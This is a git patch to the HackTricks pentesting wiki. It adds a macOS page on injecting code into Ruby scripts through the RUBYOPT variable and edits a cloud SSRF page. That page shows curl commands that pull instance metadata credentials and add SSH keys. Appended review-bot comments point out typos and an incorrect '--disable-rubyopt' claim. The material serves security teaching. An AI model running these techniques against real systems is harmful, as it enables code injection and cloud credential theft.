From f00afc243f6765bebc0fe09ca9579171876ea53e Mon Sep 17 00:00:00 2001 From: CPol Date: Mon, 22 Jan 2024 12:24:45 +0000 Subject: [PATCH] GITBOOK-4241: change request with no subject merged in GitBook --- SUMMARY.md | 1 + .../macos-proces-abuse/README.md | 8 +++ .../macos-ruby-applications-injection.md | 61 +++++++++++++++++++ .../cloud-ssrf.md | 31 +++++----- 4 files changed, 85 insertions(+), 16 deletions(-) create mode 100644 macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md diff --git a/SUMMARY.md b/SUMMARY.md index 289180b1f..298b46b3e 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -179,6 +179,7 @@ * [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md) * [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld\_insert\_libraries.md) * [macOS Perl Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md) + * [macOS Ruby Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md) * [macOS .Net Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md) * [macOS Security Protections](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md) * [macOS Gatekeeper / Quarantine / XProtect](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md) diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md index 809a3e223..94cbd7e8f 100644 
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md @@ -82,6 +82,14 @@ Check different options to make a Perl script execute arbitrary code in: [macos-perl-applications-injection.md](macos-perl-applications-injection.md) {% endcontent-ref %} +### Ruby Injection + +I't also possible to abuse ruby env variables to make arbitrary scripts execute arbitrary code: + +{% content-ref url="macos-ruby-applications-injection.md" %} +[macos-ruby-applications-injection.md](macos-ruby-applications-injection.md) +{% endcontent-ref %} + ### Python Injection If the environment variable **`PYTHONINSPECT`** is set, the python process will drop into a python cli once it's finished. It's also possible to use **`PYTHONSTARTUP`** to indicate a python script to execute at the beginning of an interactive session.\ diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md new file mode 100644 index 000000000..448c99045 --- /dev/null +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md @@ -0,0 +1,61 @@ +# macOS Ruby Applications Injection + +
+ +Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! + +Other ways to support HackTricks: + +* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+ +## RUBYOPT + +Using this env variable it's possible to **add new params** to **ruby** whenever it gets executed. Although the param **`-e`** cannot be used to specify ruby code to execute, it's possible to use the params **`-I`** and **`-r`** to add a new folder to the libraries to load path and then **specify a library to load**. + +Create the library **`inject.rb`** in **`/tmp`**: + +{% code title="inject.rb" %} +```ruby +puts `whoami` +``` +{% endcode %} + +Create anywahere a ruby script like: + +{% code title="hello.rb" %} +```ruby +puts 'Hello, World!' +``` +{% endcode %} + +Then make an arbitrary ruby script load it with: + +```bash +RUBYOPT="-I/tmp -rinject" ruby hello.rb +``` + +Fun fact, it works even with param **`--disable-rubyopt`**: + +```bash +RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt +``` + +
+ +Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! + +Other ways to support HackTricks: + +* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index 19c21af82..8c549a717 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -14,7 +14,7 @@ Other ways to support HackTricks: -
+
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. @@ -133,7 +133,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null | Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role. {% endhint %} -### SSRF for AWS Lambda +### SSRF for AWS Lambda In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**. @@ -149,7 +149,7 @@ Moreover, in addition to IAM credentials, Lambda functions also have **event dat Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app. {% endhint %} -### SSRF URL for AWS Elastic Beanstalk +### SSRF URL for AWS Elastic Beanstalk We retrieve the `accountId` and `region` from the API. 
@@ -168,13 +168,13 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. -## GCP +## GCP You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata). -### SSRF URL for Google Cloud +### SSRF URL for Google Cloud -Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs: +Requires the HTTP header **`Metadata-Flavor: Google`** and you can access the metadata endpoint in with the following URLs: * http://169.254.169.254 * http://metadata.google.internal @@ -284,7 +284,7 @@ gcloud config unset auth/access_token_file ``` {% endhint %} -### Add an SSH key +### Add an SSH key Extract the token @@ -315,7 +315,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo ``` {% endcode %} -## Digital Ocean +## Digital Ocean {% hint style="warning" %} There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials @@ -335,7 +335,7 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re curl http://169.254.169.254/metadata/v1.json | jq ``` -
+
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. @@ -477,7 +477,7 @@ At line:1 char:1 Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet ``` -## IBM Cloud +## IBM Cloud {% hint style="warning" %} Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM @@ -509,11 +509,11 @@ curl -s -X POST -H "Accept: application/json" -H "Authorization: Bearer $instanc ``` {% endcode %} -## Packetcloud +## Packetcloud Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata) -## OpenStack/RackSpace +## OpenStack/RackSpace (header required? unknown) @@ -538,7 +538,7 @@ http://192.0.0.192/latest/meta-data/ http://192.0.0.192/latest/attributes/ ``` -## Alibaba +## Alibaba ``` http://100.100.100.200/latest/meta-data/ @@ -564,19 +564,18 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json ``` -## Rancher +## Rancher ``` curl http://rancher-metadata// ``` -
+
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} -
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
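Review bot: Typo in the new `### Ruby Injection` paragraph of the `macos-proces-abuse/README.md` hunk (`@@ -82,6 +82,14 @@`): `I't also possible to abuse ruby env variables` should read `It's also possible to abuse ruby env variables`. Since the page it links to only covers `RUBYOPT`, naming that variable here (`the RUBYOPT env variable`) would keep the summary consistent with the content it points at.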
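Review bot: The `--disable-rubyopt` "fun fact" in the new `macos-ruby-applications-injection.md` (`@@ -0,0 +1,61 @@`) is an artefact of argument order, not a Ruby quirk: in `RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt` the flag comes after the script name, so the interpreter has already stopped parsing options and simply passes it to the script as `ARGV[0]`, which is why `RUBYOPT` is still honoured. The interpreter-level check is `RUBYOPT="-I/tmp -rinject" ruby --disable-rubyopt hello.rb`, where `RUBYOPT` is ignored and `inject.rb` is never loaded, so that paragraph should be corrected or dropped. Two smaller points in the same file: `anywahere` should be `anywhere`, and the sentence about `-e` would read better with the reason given, i.e. that `RUBYOPT` only accepts a restricted option set (per the ruby man page: `-d`, `-E`, `-I`, `-K`, `-r`, `-T`, `-U`, `-v`, `-w`, `-W`, `--debug`, `--disable-FEATURE`, `--enable-FEATURE`), which is exactly why the `-I` plus `-r` library-load route is the one that works.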
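Review bot: The rewritten GCP sentence in the `cloud-ssrf.md` hunk `@@ -168,13 +168,13 @@` silently drops the `X-Google-Metadata-Request: True` alternative. That header belonged to the legacy `v1beta1` metadata server endpoint, which Google has deprecated, while the `v1` endpoint only honours `Metadata-Flavor: Google`, so the change is correct but the reason deserves a word in the text and in the commit message (which currently has no subject). The sentence also keeps a stray word from the old version: `access the metadata endpoint in with the following URLs` should read `access the metadata endpoint with the following URLs`.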
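Review bot: The remaining `cloud-ssrf.md` hunks (`@@ -133`, `@@ -149`, `@@ -284`, `@@ -315`, `@@ -335`, `@@ -477`, `@@ -509`, `@@ -538`, `@@ -564`) only strip trailing spaces from headings such as `### SSRF for AWS Lambda ` and `## GCP `. That is harmless, but bundling nine whitespace-only hunks with a new page and a wording change to the GCP header requirement buries the substantive edits; consider splitting the whitespace cleanup into its own commit or at least listing it in the commit message so `git blame` readers know which hunk actually changed content.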